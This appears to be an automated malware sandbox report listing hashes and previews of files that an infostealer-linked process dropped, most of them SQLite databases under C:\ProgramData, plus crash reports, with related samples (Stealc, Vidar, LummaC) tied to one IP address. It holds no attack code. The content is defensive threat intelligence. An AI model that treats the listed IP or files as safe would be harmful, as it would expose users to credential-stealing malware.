	gHPYUEh253.exe	Get hash	malicious	Djvu, Neoreklami, Stealc, Vidar, Xmrig	Browse	46.8.231.109
	kqS23MOytx.exe	Get hash	malicious	Socks5Systemz, Stealc, Vidar, XWorm, Xmrig	Browse	46.8.231.109
	file.exe	Get hash	malicious	LummaC, Stealc, Vidar	Browse	46.8.231.109
	Z66MsXpleT.exe	Get hash	malicious	LummaC, Stealc, Vidar	Browse	46.8.231.109
	eSLlhErJ0q.exe	Get hash	malicious	LummaC, Stealc, Vidar	Browse	46.8.231.109
	file.exe	Get hash	malicious	LummaC, Stealc, Vidar	Browse	46.8.231.109

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
File Type:	SQLite 3.x database, user version 75, last written using SQLite version 3042000, page size 32768, writer version 2, read version 2, file counter 2, database pages 46, cookie 0x26, schema 4, UTF-8, version-valid-for 2
Category:	dropped
Size (bytes):	5242880
Entropy (8bit):	0.0357803477377646
Encrypted:	false
SSDEEP:	192:58rJQaXoMXp0VW9FxWwJU0VnQphI1mJ/8GJK:58r54w0VW3xWB0VaI4
MD5:	76D181A334D47872CD2E37135CC83F95
SHA1:	B563370B023073CE6E0F63671AA4AF169ABBF4E1
SHA-256:	52D831CC6F56C3A25EB9238AAF25348E1C4A3D361DFE7F99DB1D37D89A0057FD
SHA-512:	23E0D43E4785E5686868D5448628718720C5A8D9328EE814CB77807260F7CDA2D01C5DEE8F58B5713F4F09319E6CB7AB24725078C01322BAE04777418A49A9F7
Malicious:	false
Reputation:	unknown
Preview:	SQLite format 3......@ ...................&...................K..................................j.....-a>.~...\|0{dz.z.z"y.y3x.xKw.v.u.uGt.t;sAs.q.p.q.p{o.ohn.nem.n,m9l.k.lPj.j.h.h.g.d.c.c6b.b.a.a>..................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\CFBFHIEB

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 8, database pages 89, cookie 0x37, schema 4, UTF-8, version-valid-for 8
Category:	dropped
Size (bytes):	196608
Entropy (8bit):	1.1239949490932863
Encrypted:	false
SSDEEP:	384:g2qOB1nxCkvSA1LyKOMq+8iP5GDHP/0j:9q+n0E91LyKOMq+8iP5GLP/0
MD5:	271D5F995996735B01672CF227C81C17
SHA1:	7AEAACD66A59314D1CBF4016038D3A0A956BAF33
SHA-256:	9D772D093F99F296CD906B7B5483A41573E1C6BD4C91EF8DBACDA79CDF1436B4
SHA-512:	62F15B7636222CA89796FCC23FC5722657382FAAAFEDC937506CAB3286AA696609F2A5A8F479158574D9FB92D37C0AA74EA15F7A172EBF1F3D260EF6124CF8B9
Malicious:	false
Reputation:	unknown
Preview:	SQLite format 3......@ .......Y...........7......................................................j............W........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\ECFHIJKJKFIDHJKFBGHCGCAEBF

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
File Type:	SQLite 3.x database, user version 12, last written using SQLite version 3042000, page size 32768, writer version 2, read version 2, file counter 3, database pages 3, cookie 0x1, schema 4, UTF-8, version-valid-for 3
Category:	dropped
Size (bytes):	98304
Entropy (8bit):	0.08235737944063153
Encrypted:	false
SSDEEP:	12:DQAsfWk73Fmdmc/OPVJXfPNn43etRRfYR5O8atLqxeYaNcDakMG/lO:DQAsff32mNVpP965Ra8KN0MG/lO
MD5:	369B6DD66F1CAD49D0952C40FEB9AD41
SHA1:	D05B2DE29433FB113EC4C558FF33087ED7481DD4
SHA-256:	14150D582B5321D91BDE0841066312AB3E6673CA51C982922BC293B82527220D
SHA-512:	771054845B27274054B6C73776204C235C46E0C742ECF3E2D9B650772BA5D259C8867B2FA92C3A9413D3E1AD35589D8431AC683DF84A53E13CDE361789045928
Malicious:	false
Reputation:	unknown
Preview:	SQLite format 3......@ ..........................................................................j......}..}...........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\EHCFBFBAEBKJKEBGCAEH

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
Category:	dropped
Size (bytes):	40960
Entropy (8bit):	0.8553638852307782
Encrypted:	false
SSDEEP:	48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
MD5:	28222628A3465C5F0D4B28F70F97F482
SHA1:	1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
SHA-256:	93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
SHA-512:	C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
Malicious:	false
Reputation:	unknown
Preview:	SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\GHJEGCAEGIIIDHIEBKEB

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
File Type:	ASCII text, with very long lines (1717), with CRLF line terminators
Category:	dropped
Size (bytes):	10237
Entropy (8bit):	5.498288591230544
Encrypted:	false
SSDEEP:	192:/nTFTRRFYbBp6SLZNMGaXU6qU4rzy+/3/OYiNBw8D7Sl:LreDFNMroyrdw60
MD5:	0F58C61DE9618A1B53735181E43EE166
SHA1:	CC45931CF12AF92935A84C2A015786CC810AEC3A
SHA-256:	AE9C3109DD23F391DC58C564080932100F55C8E674176D7911D54FB0D3417AE0
SHA-512:	DEA527C22D4AA607B00FBBCC1CDD9C6B69E92EC3B1B14649A086E87258AAD5C280BFB2835C165176E8759F575AA39D1B58E25CB40F60C7E88D94243A874B71BE
Malicious:	false
Reputation:	unknown
Preview:	// Mozilla User Preferences....// DO NOT EDIT THIS FILE...//..// If you make changes to this file while the application is running,..// the changes will be overwritten when the application exits...//..// To change a preference value, you can either:..// - modify it via the UI (e.g. via about:config in the browser); or..// - set it within a user.js file in your profile.....user_pref("app.normandy.first_run", false);..user_pref("app.normandy.migrationsApplied", 12);..user_pref("app.normandy.user_id", "a24b7aae-efcd-4433-83ad-3649b8231e2d");..user_pref("app.update.auto.migrated", true);..user_pref("app.update.background.rolledout", true);..user_pref("app.update.lastUpdateTime.browser-cleanup-thumbnails", 0);..user_pref("app.update.lastUpdateTime.recipe-client-addon-run", 1696486832);..user_pref("app.update.lastUpdateTime.region-update-timer", 0);..user_pref("app.update.lastUpdateTime.rs-experiment-loader-timer", 1696486836);..user_pref("app.update.lastUpdateTime.xpi-signature-verification

C:\ProgramData\HIJJEGDB

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
Category:	dropped
Size (bytes):	106496
Entropy (8bit):	1.136471148832945
Encrypted:	false
SSDEEP:	192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6c1/k4:MnlyfnGtxnfVuSVumEH1s4
MD5:	37B1FC046E4B29468721F797A2BB968D
SHA1:	50055EF1C50E4C1A7CCF7D00620E95128E4C448B
SHA-256:	7BBD5DFC9026E0D477B027B9A2A3F022F2E72FC9B4E05E697461A00677AE8EFD
SHA-512:	1D8A0F0AE76E5A1CF131F6D2C5156EA4204449942210EF029D5B018464355DBF94E2D8ABD6A5A9CDFE4271DCD22703BF26ECE8FEE902E122184680F1BB001149
Malicious:	false
Reputation:	unknown
Preview:	SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\IIEBKJECFCFB\EBAKFI

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, file counter 6, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 6
Category:	dropped
Size (bytes):	20480
Entropy (8bit):	0.8508558324143882
Encrypted:	false
SSDEEP:	24:TLlF1kwNbXYFpFNYcw+6UwcQVXH5fBaJvWKC0ABndzGrW7swaE:TxFawNLopFgU10XJBaEKQxdgQsw
MD5:	933D6D14518371B212F36C3835794D75
SHA1:	92D056D912B3C0260D379330D3CC0359B57A322B
SHA-256:	55390EE61FB85370A8A7F51A8DD5374F7B1801D1D7DF09D6A90CDD74ED6E7D1E
SHA-512:	EAC706D8A579500EADA26FB9883E1F3CE9112A03F38EE78B11B393AB0A3285945F8E06EB406BFC17D1CB540F840E435E515FABFC265399CE6F5193980FDE3F2C
Malicious:	false
Reputation:	unknown
Preview:	SQLite format 3......@ ..........................................................................j..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\IIEBKJECFCFB\FIDGDA

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
Category:	dropped
Size (bytes):	40960
Entropy (8bit):	0.8553638852307782
Encrypted:	false
SSDEEP:	48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
MD5:	28222628A3465C5F0D4B28F70F97F482
SHA1:	1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
SHA-256:	93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
SHA-512:	C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
Malicious:	false
Reputation:	unknown
Preview:	SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\IIEBKJECFCFB\FIJJKE

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, file counter 1, database pages 39, cookie 0x20, schema 4, UTF-8, version-valid-for 1
Category:	dropped
Size (bytes):	159744
Entropy (8bit):	0.5394293526345721
Encrypted:	false
SSDEEP:	96:AquejzH+bF+UIYysX0IxQzh/tsV0NifLjLqLy0e9S8E:AqtH+bF+UI3iN0RSV0k3qLyj9
MD5:	52701A76A821CDDBC23FB25C3FCA4968
SHA1:	440D4B5A38AF50711C5E6C6BE22D80BC17BF32DE
SHA-256:	D602B4D0B3EB9B51535F6EBA33709DCB881237FA95C5072CB39CECF0E06A0AC4
SHA-512:	2653C8DB9C20207FA7006BC9C63142B7C356FB9DC97F9184D60C75D987DC0848A8159C239E83E2FC9D45C522FEAE8D273CDCD31183DED91B8B587596183FC000
Malicious:	false
Reputation:	unknown
Preview:	SQLite format 3......@ .......'........... ......................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\JDGHIIJKEBGIDHIDBKJD

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 2, database pages 25, cookie 0xe, schema 4, UTF-8, version-valid-for 2
Category:	dropped
Size (bytes):	51200
Entropy (8bit):	0.8745947603342119
Encrypted:	false
SSDEEP:	96:aZ8mmwLCn8MouB6wzFlOqUvJKLReZff44EK:W8yLG7IwRWf4
MD5:	378391FDB591852E472D99DC4BF837DA
SHA1:	10CB2CDAD4EDCCACE0A7748005F52C5251F6F0E0
SHA-256:	513C63B0E44FFDE2B4E511A69436799A8B59585CB0EB5CCFDA7A9A8F06BA4808
SHA-512:	F099631BEC265A6E8E4F8808270B57FFF28D7CBF75CC6FA046BB516E8863F36E8506C7A38AD682132FCB1134D26326A58F5B588B9EC9604F09FD7155B2AEF2DA
Malicious:	false
Reputation:	unknown
Preview:	SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\KEBFHIJECFIDGDGCGHCGIIECAF

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, file counter 6, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 6
Category:	dropped
Size (bytes):	20480
Entropy (8bit):	0.8508558324143882
Encrypted:	false
SSDEEP:	24:TLlF1kwNbXYFpFNYcw+6UwcQVXH5fBaJvWKC0ABndzGrW7swaE:TxFawNLopFgU10XJBaEKQxdgQsw
MD5:	933D6D14518371B212F36C3835794D75
SHA1:	92D056D912B3C0260D379330D3CC0359B57A322B
SHA-256:	55390EE61FB85370A8A7F51A8DD5374F7B1801D1D7DF09D6A90CDD74ED6E7D1E
SHA-512:	EAC706D8A579500EADA26FB9883E1F3CE9112A03F38EE78B11B393AB0A3285945F8E06EB406BFC17D1CB540F840E435E515FABFC265399CE6F5193980FDE3F2C
Malicious:	false
Reputation:	unknown
Preview:	SQLite format 3......@ ..........................................................................j..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\KKFBFCAFCBKFIEBFHIDBAKJJJJ

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, file counter 7, database pages 5, cookie 0x5, schema 4, UTF-8, version-valid-for 7
Category:	dropped
Size (bytes):	20480
Entropy (8bit):	0.6732424250451717
Encrypted:	false
SSDEEP:	24:TLO1nKbXYFpFNYcoqT1kwE6UwpQ9YHVXxZ6HfB:Tq1KLopF+SawLUO1Xj8B
MD5:	CFFF4E2B77FC5A18AB6323AF9BF95339
SHA1:	3AA2C2115A8EB4516049600E8832E9BFFE0C2412
SHA-256:	EC8B67EF7331A87086A6CC085B085A6B7FFFD325E1B3C90BD3B9B1B119F696AE
SHA-512:	0BFDC8D28D09558AA97F4235728AD656FE9F6F2C61DDA2D09B416F89AB60038537B7513B070B907E57032A68B9717F03575DB6778B68386254C8157559A3F1BC
Malicious:	false
Reputation:	unknown
Preview:	SQLite format 3......@ ..........................................................................j...$......g..........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\Microsoft\Network\Downloader\edb.log

Download File

Process:	C:\Windows\System32\svchost.exe
File Type:	data
Category:	dropped
Size (bytes):	1310720
Entropy (8bit):	0.7263327458485127
Encrypted:	false
SSDEEP:	1536:9J8s6YR3pnhWKInznxTgScwXhCeEcrKYSZNmTHk4UQJ32aqGT46yAwFM5hA7yH0g:9JZj5MiKNnNhoxu1
MD5:	2AFC5885FD3C10CECF46EF42EF4E1BEF
SHA1:	4461684193FA24302F173B728B4996864EA80420
SHA-256:	22A75F739CE0922998541197F2A95DE8F07E3908319CBFEDF32634C9726CF118
SHA-512:	114C663B8148AC7CA9F1A1F2A18A0B6F45421EB53A2B53C3E95A6DF1C01809B67F4F83BD07C82B6E5CAC2E23F01344D7B7CCAE61B7BA9BF4EBB1DBAC7F2C259E
Malicious:	false
Reputation:	unknown
Preview:	...........@..@9....{...;...{..........<...D./..;...{..................C:\ProgramData\Microsoft\Network\Downloader\.........................................................................................................................................................................................................................C:\ProgramData\Microsoft\Network\Downloader\..........................................................................................................................................................................................................................0u..................@...@....................................Fajaj.#.........`h.................h.......6.......X\...;...{..................C.:.\.P.r.o.g.r.a.m.D.a.t.a.\.M.i.c.r.o.s.o.f.t.\.N.e.t.w.o.r.k.\.D.o.w.n.l.o.a.d.e.r.\.q.m.g.r...d.b....................................................................................................................................................................

C:\ProgramData\Microsoft\Network\Downloader\qmgr.db

Download File

Process:	C:\Windows\System32\svchost.exe
File Type:	Extensible storage user DataBase, version 0x620, checksum 0xc1191b29, page size 16384, DirtyShutdown, Windows version 10.0
Category:	dropped
Size (bytes):	1310720
Entropy (8bit):	0.7555875198437166
Encrypted:	false
SSDEEP:	1536:tSB2ESB2SSjlK/svFH03N9Jdt8lYkr3g16xj2UPkLk+kLWyrufTRryrUYc//kbxW:tazaSvGJzYj2UlmOlOL
MD5:	195035AA5A71717CE9134A72AA24F698
SHA1:	D1BD98D79C84E38B6465D2ED829A6038E5FFD5FE
SHA-256:	642387F175145A104CEA2C60318AD185EA6464B3BF57EE712E6B814C58B0921A
SHA-512:	154BC23C2205DC490684F1A14B5D5CF8B2DF027AC552A2475FB2C3126184A9BDEB175C8E40CF056D262306377068DCFEB05D4AF5D2692FC61B63F6743E0D37F6
Malicious:	false
Reputation:	unknown
Preview:	...)... .......7.......X\...;...{......................0.e......!...{?..%...\|..h.g.........................D./..;...{..........................................................................................................eJ......n....@...................................................................................................... .......9....{...............................................................................................................................................................................................2...{..................................y...%...\|5..................t...%...\|...........................#......h.g.....................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\Microsoft\Network\Downloader\qmgr.jfm

Download File

Process:	C:\Windows\System32\svchost.exe
File Type:	data
Category:	dropped
Size (bytes):	16384
Entropy (8bit):	0.07976505441778572
Encrypted:	false
SSDEEP:	3:ogcyYeNqOEefNaAPaU1lq9ltalluxmO+l/SNxOf:ogTzNqrENDPaU7gmOH
MD5:	A03FB9E04E0ACCC336E8BD4D515D1AAD
SHA1:	2657701C2D27F3D0235D1394BBAB4B48E651C715
SHA-256:	B3CFA08035C3D98722A0181D1506873854574564BE33640E1E36C5D63888DE3F
SHA-512:	C833CFFF119DBD279B39F59F0A4967E6409B711E779E528CAD0BA90D5BB9AFD8E9A1CE572D01B18213B49C5B7EB6A7D79C258396FAB9774542A2A6C6C3FD28E3
Malicious:	false
Reputation:	unknown
Preview:	........................................;...{...%...\|...!...{?..........!...{?..!...{?..g...!...{?..................t...%...\|..........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_l6BAwR4854FJ5LVX_82339dabe1454458e4b35fe78f21d4d1d43bdf1_fa394b7d_6e5f7ac7-01e0-4b31-9526-a1c3e751ffc2\Report.wer

Download File

Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	Unicode text, UTF-16, little-endian text, with CRLF line terminators
Category:	dropped
Size (bytes):	65536
Entropy (8bit):	0.8859296276782306
Encrypted:	false
SSDEEP:	96:k6F+rykpHI/6MldvxKb3UQXIDcQvc6QcEVcw3cE/p+G+BHUHZopAnQHdE7HeS9+4:PW3p+s0BU/ia6DzuiF5Z24IO8v
MD5:	0F4864D9F98F7CC3CFA1D7460089465C
SHA1:	A66856EB9204E3421FECEFE465BB30312B9D7570
SHA-256:	FD1ED7A5A60405B63D2BAE68A90176330F35AE8B65415BF9729461D3E71077F9
SHA-512:	92F9B2F627842EACC9CC8DE2CFBA395CCFA7B780E93F6259FC9430FFC72BF3008F6F3A22897C48EA1BCB1676F9E82BB6802365AC580658194AF02B4C5784EBA3
Malicious:	false
Reputation:	unknown
Preview:	..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.C.L.R.2.0.r.3.....E.v.e.n.t.T.i.m.e.=.1.3.3.6.9.9.3.7.8.4.9.1.5.9.1.9.3.3.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....U.p.l.o.a.d.T.i.m.e.=.1.3.3.6.9.9.3.7.8.5.2.5.0.7.4.1.4.1.....R.e.p.o.r.t.S.t.a.t.u.s.=.5.2.4.3.8.4.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.6.e.5.f.7.a.c.7.-.0.1.e.0.-.4.b.3.1.-.9.5.2.6.-.a.1.c.3.e.7.5.1.f.f.c.2.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.7.4.8.9.2.c.d.8.-.e.3.8.0.-.4.9.b.a.-.b.7.0.1.-.b.0.b.c.a.6.6.1.c.6.9.b.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....W.o.w.6.4.G.u.e.s.t.=.3.3.2.....N.s.A.p.p.N.a.m.e.=.l.6.B.A.w.R.4.8.5.4.F.J.5.L.V.X.v.o.8.G.W.f.A.t...e.x.e.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.1.6.0.c.-.0.0.0.1.-.0.0.1.5.-.f.4.7.e.-.0.d.5.6.e.0.f.e.d.a.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.6.c.e.7.8.3.0.8.f.5.6.3.4.c.e.f.6.2.e.9.0.2.a.7.9.2.c.b.f.2.d.1.d.0.0.0.0.0.0.0.0.!.0.0.0.0.2.5.5.9.4.4.d.c.0.d.2.4.d.2.2.d.f.a.3.6.6.1.3.c.2.b.6.8.a.a.8.1.0.7.0.a.f.1.c.5.!.l.6.B.A.w.R.4.8.5.4.F.J.

C:\ProgramData\Microsoft\Windows\WER\Temp\WER44F.tmp.dmp

Download File

Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	Mini DuMP crash report, 15 streams, Wed Sep 4 15:37:29 2024, 0x1205a4 type
Category:	dropped
Size (bytes):	173021
Entropy (8bit):	3.9310475609798474
Encrypted:	false
SSDEEP:	1536:xWsZbFpN4uE2aO2d5OCDVLTgwIQNhSr1NgxN/9Hu17ikaGqu4:xWe4uEq2dvVLTgwlNUr49Gk
MD5:	3EB9605982470295701F5FD5DACEAB49
SHA1:	36652165F1192BC2C43418B15102B0A436B46CCF
SHA-256:	FF22F2B42DCA2D0C38C40AA26A81AF926999D6BB4847B669198C9D835533AB71
SHA-512:	D8C1BE4174B64DC6A4F80852B476BE21063911C001058AE4CE0935F023028F55283465EA996719E3DA92B9680FC630BB9F6119102ADCD83610981B769A4A7DB2
Malicious:	false
Reputation:	unknown
Preview:	MDMP..a..... ........~.f....................................$...........D!...6..........`.......8...........T............ ..%.......................................................................................................eJ......0.......GenuineIntel............T............~.f.............................0..............,...E.a.s.t.e.r.n. .S.t.a.n.d.a.r.d. .T.i.m.e...........................................E.a.s.t.e.r.n. .S.u.m.m.e.r. .T.i.m.e...............................................1.9.0.4.1...1...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.......................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\Microsoft\Windows\WER\Temp\WER7376.tmp.csv

Download File

Process:	C:\Windows\System32\svchost.exe
File Type:	data
Category:	dropped
Size (bytes):	81388
Entropy (8bit):	3.041422655893951
Encrypted:	false
SSDEEP:	1536:sK/ZUvyeOmmaggCvS2aQdCKeQ0ZTrjR8ocMms5:sK/ZUvyeOmmaggCvS2aQdZeQ0ZTrjR8C
MD5:	E81927BC03BD0DEF2BCC897C1910472A
SHA1:	674452FEC5169EADC2BD5C93554E3921E098E320
SHA-256:	5044AE0E2609F9100192A3585F9F195A4FA2F92D3E81F6F046BE276FB3819628
SHA-512:	143B16C127025BE580BCF8A357AED614C1A4A25135EDD8D211999F4433EE95919A3F90D2CC446D4E16B3F1A86B1106E6A430F30C54C227CE592F9C7FF5BBFB55
Malicious:	false
Reputation:	unknown
Preview:	I.m.a.g.e.N.a.m.e.,.U.n.i.q.u.e.P.r.o.c.e.s.s.I.d.,.N.u.m.b.e.r.O.f.T.h.r.e.a.d.s.,.W.o.r.k.i.n.g.S.e.t.P.r.i.v.a.t.e.S.i.z.e.,.H.a.r.d.F.a.u.l.t.C.o.u.n.t.,.N.u.m.b.e.r.O.f.T.h.r.e.a.d.s.H.i.g.h.W.a.t.e.r.m.a.r.k.,.C.y.c.l.e.T.i.m.e.,.C.r.e.a.t.e.T.i.m.e.,.U.s.e.r.T.i.m.e.,.K.e.r.n.e.l.T.i.m.e.,.B.a.s.e.P.r.i.o.r.i.t.y.,.P.e.a.k.V.i.r.t.u.a.l.S.i.z.e.,.V.i.r.t.u.a.l.S.i.z.e.,.P.a.g.e.F.a.u.l.t.C.o.u.n.t.,.W.o.r.k.i.n.g.S.e.t.S.i.z.e.,.P.e.a.k.W.o.r.k.i.n.g.S.e.t.S.i.z.e.,.Q.u.o.t.a.P.e.a.k.P.a.g.e.d.P.o.o.l.U.s.a.g.e.,.Q.u.o.t.a.P.a.g.e.d.P.o.o.l.U.s.a.g.e.,.Q.u.o.t.a.P.e.a.k.N.o.n.P.a.g.e.d.P.o.o.l.U.s.a.g.e.,.Q.u.o.t.a.N.o.n.P.a.g.e.d.P.o.o.l.U.s.a.g.e.,.P.a.g.e.f.i.l.e.U.s.a.g.e.,.P.e.a.k.P.a.g.e.f.i.l.e.U.s.a.g.e.,.P.r.i.v.a.t.e.P.a.g.e.C.o.u.n.t.,.R.e.a.d.O.p.e.r.a.t.i.o.n.C.o.u.n.t.,.W.r.i.t.e.O.p.e.r.a.t.i.o.n.C.o.u.n.t.,.O.t.h.e.r.O.p.e.r.a.t.i.o.n.C.o.u.n.t.,.R.e.a.d.T.r.a.n.s.f.e.r.C.o.u.n.t.,.W.r.i.t.e.T.r.a.n.s.f.e.r.C.o.u.n.t.,.O.t.h.e.r.T.r.a.n.s.f.e.r.C.o.u.n.t.,.H.a.n.

C:\ProgramData\Microsoft\Windows\WER\Temp\WER7655.tmp.txt

Download File

Process:	C:\Windows\System32\svchost.exe
File Type:	data
Category:	dropped
Size (bytes):	13340
Entropy (8bit):	2.6920396432658005
Encrypted:	false
SSDEEP:	96:TiZYWeE0UObYKLY9WNHHXfYEZPItFikMjEhw8C6aPhIKMmzXGICfT:2ZDlUrLpVcZaPh1MmzXBCfT
MD5:	EA4C7148424EDD6A3BD1AE755D2F8534
SHA1:	40A3F8762C0B0D4F8CEEFE18F0D2AE1F88B413D3
SHA-256:	377624D4FD902EFCD14FE70BE2295F2DC80685B24347B3C339DACFFE561B6F02
SHA-512:	3576D2D5A747D7FC31273F64DE640E4786D09845F3B9C23C4E7E92B6A007782A95548BA10500C0ECFC51CE8A2CBD9DAF8F5D0E9E32A0DE1E7042823B18634222
Malicious:	false
Reputation:	unknown
Preview:	B...T.i.m.e.r.R.e.s.o.l.u.t.i.o.n. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .1.5.6.2.5.0.....B...P.a.g.e.S.i.z.e. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .4.0.9.6.....B...N.u.m.b.e.r.O.f.P.h.y.s.i.c.a.l.P.a.g.e.s. . . . . . . . . . . . . . . . . . . . . . . . . . .1.0.4.8.3.3.3.....B...L.o.w.e.s.t.P.h.y.s.i.c.a.l.P.a.g.e.N.u.m.b.e.r. . . . . . . . . . . . . . . . . . . . . . . . . . . . . .2.....B...H.i.g.h.e.s.t.P.h.y.s.i.c.a.l.P.a.g.e.N.u.m.b.e.r. . . . . . . . . . . . . . . . . . . . . . .1.3.1.0.7.1.9.....B...A.l.l.o.c.a.t.i.o.n.G.r.a.n.u.l.a.r.i.t.y. . . . . . . . . . . . . . . . . . . . . . . . . . . . .6.5.5.3.6.....B...M.i.n.i.m.u.m.U.s.e.r.M.o.d.e.A.d.d.r.e.s.s. . . . . . . . . . . . . . . . . . . . . . . . . . . .6.5.5.3.6.....B...M.a.x.i.m.u.m.U.s.e.r.M.o.d.e.A.d.d.r.e.s.s. . . . . . . . . . . . . . . . . .1.4.0.7.3.7.4.8.8.2.8.9.7.9.1.....B...A.c.t.i.v.e.P.r.o.c.e.s.s.o.r.s.A.f.f.i.n.i.t.y.M.a.s.k. . . . . . .

C:\ProgramData\Microsoft\Windows\WER\Temp\WER809.tmp.WERInternalMetadata.xml

Download File

Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
Category:	dropped
Size (bytes):	6456
Entropy (8bit):	3.732170237487989
Encrypted:	false
SSDEEP:	96:RSIU6o7wVetb6e6FYZNeVqQE/FV645aM4UO89bg0sf9Cgm:R6l7wVeJ6e6FYZNXrprO89bg0sfUgm
MD5:	FC130DA4EDAF0A07199C25587501F1D7
SHA1:	4D2B8FBF9987CCF1C683783990E5F109B4694EE5
SHA-256:	BDF5DC5F7D6B6F0EF36A0CA261C739CC5C978EF94EBDF61C71F63CDE0B1AC47B
SHA-512:	668DC6A8F6C6E8193001C43B055D271A0E21E60DC72DA1D2A4877DE0C750F13D4526CAD372EBDF2B42E19CDE5019A53CF92B0E3657031A383B23C41348AD2B31
Malicious:	false
Reputation:	unknown
